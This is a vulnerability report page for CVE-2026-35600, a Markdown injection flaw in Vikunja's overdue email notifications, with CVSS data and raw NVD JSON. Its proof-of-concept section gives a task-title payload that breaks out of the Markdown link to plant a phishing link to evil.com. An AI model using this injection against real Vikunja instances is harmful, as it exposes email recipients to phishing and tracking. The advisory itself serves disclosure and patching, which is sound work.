Security Vulnerability Report
中文
CVE-2026-35600 CVSS 5.4 MEDIUM

CVE-2026-35600

Published: 2026-04-10 17:17:04
Last Modified: 2026-04-17 21:56:40
Source: [email protected]

Description

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, task titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows <a> and <img> tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails. This vulnerability is fixed in 2.3.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja < 2.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-35600 # Target: Vikunja < 2.3.0 # 1. Attacker creates a task with a malicious title. # The email template uses the title inside a Markdown link, e.g., [$title](task_url). # To inject a phishing link, we need to break out of the existing link structure. malicious_payload = "](https://evil.com/phishing)[Click Here for Reward" # 2. When the overdue email is generated, the Markdown source looks like: # [](https://evil.com/phishing)[Click Here for Reward](https://vikunja.example.com/task/1) # 3. The Markdown parser interprets this as: # - A link with text "" pointing to "https://evil.com/phishing" # - Text "[Click Here for Reward]" # - A link pointing to the actual task. # 4. The victim sees a link pointing to evil.com in the email.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35600", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:03.680", "lastModified": "2026-04-17T21:56:40.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, task titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows <a> and <img> tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails. This vulnerability is fixed in 2.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.0", "matchCriteriaId": "CC8B46CF-6E7B-46F4-8275-D1A38F2A6D5E"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/commit/0f3730d045f20e261e3cdfc6d93c325653395b64", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/go-vikunja/vikunja/pull/2580", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-45q4-x4r9-8fqj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.